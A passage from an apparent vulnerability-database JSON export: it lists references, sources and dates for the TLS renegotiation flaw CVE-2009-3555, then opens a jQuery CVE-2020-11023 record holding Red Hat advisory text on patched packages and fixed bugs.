"url": "http://www.mozilla.org/security/announce/2011/mfsa2011-11.html"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0058"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3771"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2479"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3383"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1303"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2465"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3170"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2377"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3991"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3982"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5012"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1957"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2755"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1948"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3961"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0470"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3773"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3076"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0166"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-1571"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3984"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3640"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2436"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3981"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1970"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0461"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4215"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5021"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4058"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0451"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0771"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-0017"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3836"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5013"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4212"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0459"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0076"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0083"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0460"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0183"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1201"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3960"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0059"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0177"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3062"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5018"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3177"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3980"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2363"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0084"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3652"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1941"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201301-01.xml"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3074"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1937"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-3835"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0053"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3171"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2999"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0471"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0065"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0162"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3373"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2665"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://www.canonical.com"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-4929"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "http://security.freebsd.org/patches/sa-09:16/rtld.patch.asc"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4146"
},
{
"trust": 0.1,
"url": "http://security.freebsd.org/\u003e."
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4147"
},
{
"trust": 0.1,
"url": "http://security.freebsd.org/advisories/freebsd-sa-09:16.rtld.asc"
},
{
"trust": 0.1,
"url": "http://security.freebsd.org/patches/sa-09:16/rtld7.patch"
},
{
"trust": 0.1,
"url": "http://security.freebsd.org/patches/sa-09:16/rtld7.patch.asc"
},
{
"trust": 0.1,
"url": "http://security.freebsd.org/patches/sa-09:16/rtld.patch"
},
{
"trust": 0.1,
"url": "http://www.freebsd.org/handbook/makeworld.html\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0087"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0088"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0085"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0839"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0084"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0091"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0837"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0089"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3793"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0092"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-4546"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0095"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0093"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0094"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0090"
},
{
"trust": 0.1,
"url": "http://www.hp.com/go/hpsim"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2204"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0033"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3548"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2526"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3190"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4476"
},
{
"trust": 0.1,
"url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws_java.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1157"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2901"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#120541"
},
{
"db": "VULHUB",
"id": "VHN-41001"
},
{
"db": "VULMON",
"id": "CVE-2009-3555"
},
{
"db": "BID",
"id": "36935"
},
{
"db": "PACKETSTORM",
"id": "89136"
},
{
"db": "PACKETSTORM",
"id": "130868"
},
{
"db": "PACKETSTORM",
"id": "100761"
},
{
"db": "PACKETSTORM",
"id": "89026"
},
{
"db": "PACKETSTORM",
"id": "111583"
},
{
"db": "PACKETSTORM",
"id": "101257"
},
{
"db": "PACKETSTORM",
"id": "119293"
},
{
"db": "PACKETSTORM",
"id": "92095"
},
{
"db": "PACKETSTORM",
"id": "120365"
},
{
"db": "PACKETSTORM",
"id": "83415"
},
{
"db": "PACKETSTORM",
"id": "91749"
},
{
"db": "PACKETSTORM",
"id": "111920"
},
{
"db": "PACKETSTORM",
"id": "83271"
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
},
{
"db": "NVD",
"id": "CVE-2009-3555"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#120541",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-41001",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2009-3555",
"ident": null
},
{
"db": "BID",
"id": "36935",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "89136",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "130868",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "100761",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "89026",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "111583",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "101257",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "119293",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "92095",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "120365",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "83415",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "91749",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "111920",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "83271",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2009-3555",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2009-11-11T00:00:00",
"db": "CERT/CC",
"id": "VU#120541",
"ident": null
},
{
"date": "2009-11-09T00:00:00",
"db": "VULHUB",
"id": "VHN-41001",
"ident": null
},
{
"date": "2009-11-04T00:00:00",
"db": "BID",
"id": "36935",
"ident": null
},
{
"date": "2010-05-03T23:54:02",
"db": "PACKETSTORM",
"id": "89136",
"ident": null
},
{
"date": "2015-03-18T00:44:34",
"db": "PACKETSTORM",
"id": "130868",
"ident": null
},
{
"date": "2011-04-24T07:03:07",
"db": "PACKETSTORM",
"id": "100761",
"ident": null
},
{
"date": "2010-04-28T20:44:54",
"db": "PACKETSTORM",
"id": "89026",
"ident": null
},
{
"date": "2012-04-05T00:45:56",
"db": "PACKETSTORM",
"id": "111583",
"ident": null
},
{
"date": "2011-05-10T00:45:11",
"db": "PACKETSTORM",
"id": "101257",
"ident": null
},
{
"date": "2013-01-08T03:21:24",
"db": "PACKETSTORM",
"id": "119293",
"ident": null
},
{
"date": "2010-07-23T18:03:56",
"db": "PACKETSTORM",
"id": "92095",
"ident": null
},
{
"date": "2013-02-18T15:23:02",
"db": "PACKETSTORM",
"id": "120365",
"ident": null
},
{
"date": "2009-12-03T21:03:04",
"db": "PACKETSTORM",
"id": "83415",
"ident": null
},
{
"date": "2010-07-14T04:19:30",
"db": "PACKETSTORM",
"id": "91749",
"ident": null
},
{
"date": "2012-04-17T20:41:11",
"db": "PACKETSTORM",
"id": "111920",
"ident": null
},
{
"date": "2009-11-30T21:44:08",
"db": "PACKETSTORM",
"id": "83271",
"ident": null
},
{
"date": "2009-11-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200911-069",
"ident": null
},
{
"date": "2009-11-09T17:30:00.407000",
"db": "NVD",
"id": "CVE-2009-3555",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2011-07-22T00:00:00",
"db": "CERT/CC",
"id": "VU#120541",
"ident": null
},
{
"date": "2023-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-41001",
"ident": null
},
{
"date": "2017-12-19T22:00:00",
"db": "BID",
"id": "36935",
"ident": null
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200911-069",
"ident": null
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2009-3555",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "89136"
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "SSL and TLS protocols renegotiation vulnerability",
"sources": [
{
"db": "CERT/CC",
"id": "VU#120541"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
}
],
"trust": 0.6
}
}
VAR-202004-2199
Vulnerability from variot - Updated: 2026-03-09 22:15In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Low: pcs security, bug fix, and enhancement update Advisory ID: RHSA-2021:4142-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4142 Issue date: 2021-11-09 CVE Names: CVE-2020-7656 CVE-2020-11023 ==================================================================== 1. Summary:
An update for pcs is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux HighAvailability (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux ResilientStorage (v. 8) - ppc64le, s390x, x86_64
- Description:
The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.
The following packages have been upgraded to a later upstream version: pcs (0.10.10).
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1290830 - [RFE] pcs command is missing a way to retrieve the status of a single resource
1432097 - pcs status nodes shows incomplete information when both standby and maintenance modes are set for a node
1678273 - Moving the last resource from a group may result in an invalid CIB
1690419 - Improve guest node error message when pacemaker_remote is running
1720221 - [RFE] Add support for corosync option totem.block_unlisted_ips
1759995 - [RFE] Need ability to add/remove storage devices with scsi fencing
1841019 - [TechPreview Exit][RFE] Add a 'local' cluster setup command
1850004 - CVE-2020-11023 jquery: Untrusted code execution via tag in HTML passed to DOM manipulation methods
1850119 - CVE-2020-7656 jquery: Cross-site scripting (XSS) via HTML tags containing whitespaces
1854238 - Labeling and Confirmation Dialog for UI Elements start(on)/stop(off)/restart(reboot)
1872378 - [RFE] Provide a way to add a scsi fencing device to a cluster without requiring a restart of all cluster resources
1885293 - Support new role terminology in pacemaker 2.1
1885302 - reflect changes in crm_mon --as-xml
1896458 - Default rules with node attributes expressions can be created but are not in effect
1909901 - [RFE] Add --quiet flag to pcs resource disable --safe to only show error messages instead of full output
1922996 - New web UI - add more functionalities to the cluster management
1927384 - New web UI - clone and group settings are not in effect when creating new resource
1927394 - New web UI - cleanup of resource and fence device doesn't work
1930886 - Update help/man pcs to include clone id as an option in 'pcs resource unclone' parameters
1935594 - pcs rebase bz for 8.5
1984901 - sbd can't be enabled via pcs with stopped cluster
1991654 - update-scsi-devices command unfence a node without quorum
1992668 - [RFE] Provide add/remove syntax for command pcs stonith update-scsi-devices
1998454 - nginx resource can't be created
- Package List:
Red Hat Enterprise Linux HighAvailability (v. 8):
Source: pcs-0.10.10-4.el8.src.rpm
aarch64: pcs-0.10.10-4.el8.aarch64.rpm pcs-snmp-0.10.10-4.el8.aarch64.rpm
ppc64le: pcs-0.10.10-4.el8.ppc64le.rpm pcs-snmp-0.10.10-4.el8.ppc64le.rpm
s390x: pcs-0.10.10-4.el8.s390x.rpm pcs-snmp-0.10.10-4.el8.s390x.rpm
x86_64: pcs-0.10.10-4.el8.x86_64.rpm pcs-snmp-0.10.10-4.el8.x86_64.rpm
Red Hat Enterprise Linux ResilientStorage (v. 8):
Source: pcs-0.10.10-4.el8.src.rpm
ppc64le: pcs-0.10.10-4.el8.ppc64le.rpm pcs-snmp-0.10.10-4.el8.ppc64le.rpm
s390x: pcs-0.10.10-4.el8.s390x.rpm pcs-snmp-0.10.10-4.el8.s390x.rpm
x86_64: pcs-0.10.10-4.el8.x86_64.rpm pcs-snmp-0.10.10-4.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-7656 https://access.redhat.com/security/cve/CVE-2020-11023 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYYre19zjgjWX9erEAQhbXQ//fpAgz6azVHUidymjlIJ/d65HrM9a+hwU 2c7zeYGKSBUpxWTIo0LzwVn7oQTJpmPdbDZzedS14e3ZijQcMjwImHI6yzlAkDxl hycmu4PakPBE3s7tmOIaUybc8opHPDLGbyBvohe7O3U+5oTvUBWhI35jeX3CTjsE RQFEwII4uqiTJ5pOnVN0TFfkooz5pY6oArGPg3kFb+17T9C0TWXxB/Nbyqg+yLJ3 krjB/aFgcm2RsP+IFB9Rg6RFaovKozXhckhJ+UxC2sQWKehnU8bhLVCf+l5psM6l jnQtZi2LQOXlB8UQsjK3PWtyxVF7/MFmfLK7VX3RStCxukLKDIGc99tYl4zjgrJQ LshNnrn6Lz6iWiMFPFnwDhOAbey5LUrpygQUgVU1t4Mhtlpu5FTPGxiZkSVdPPUe Kg/VCDkxPMVO6Mhnjg6axWYiv3WmvM3DLTL0alqjyShe6BW2E/BB8trt9eaCpoe/ EtDBmrBKwLyK5LnToeLK0GL+HDGQDUjL0eWRNKJox8PVtFEtSkyn7I8jaOVeyTIc F9kOxECcY4tQBFegYaDXCIIBAGJda4eyzZR95zzwRWdl8AxuffV8n7enKfShMeqY L1HtkJq3Twced5fqhHRhqwKHEzWl3nKqTz8/gt5OjjLKNZ0M62oTeUjR918+k7+U OPYd9garVDY=fv9r -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
Security Fix(es):
-
jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection (CVE-2019-11358)
-
jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
-
bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
-
jquery: Untrusted code execution via tag in HTML passed to DOM manipulation methods (CVE-2020-11023)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
bootstrap: XSS in the data-target attribute (CVE-2016-10735)
-
bootstrap: Cross-site Scripting (XSS) in the data-target property of scrollspy (CVE-2018-14041)
-
sshd-common: mina-sshd: Java unsafe deserialization vulnerability (CVE-2022-45047)
-
woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks (CVE-2022-40152)
-
bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip (CVE-2018-14042)
-
bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)
-
nodejs-moment: Regular expression denial of service (CVE-2017-18214)
-
wildfly-elytron: possible timing attacks via use of unsafe comparator (CVE-2022-3143)
-
jackson-databind: use of deeply nested arrays (CVE-2022-42004)
-
jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)
-
jettison: parser crash by stackoverflow (CVE-2022-40149)
-
jettison: memory exhaustion via user-supplied XML or JSON data (CVE-2022-40150)
-
jettison: If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos (CVE-2022-45693)
-
CXF: Apache CXF: SSRF Vulnerability (CVE-2022-46364)
-
Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1553413 - CVE-2017-18214 nodejs-moment: Regular expression denial of service 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601616 - CVE-2018-14041 bootstrap: Cross-site Scripting (XSS) in the data-target property of scrollspy 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1850004 - CVE-2020-11023 jquery: Untrusted code execution via tag in HTML passed to DOM manipulation methods 2124682 - CVE-2022-3143 wildfly-elytron: possible timing attacks via use of unsafe comparator 2134291 - CVE-2022-40152 woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks 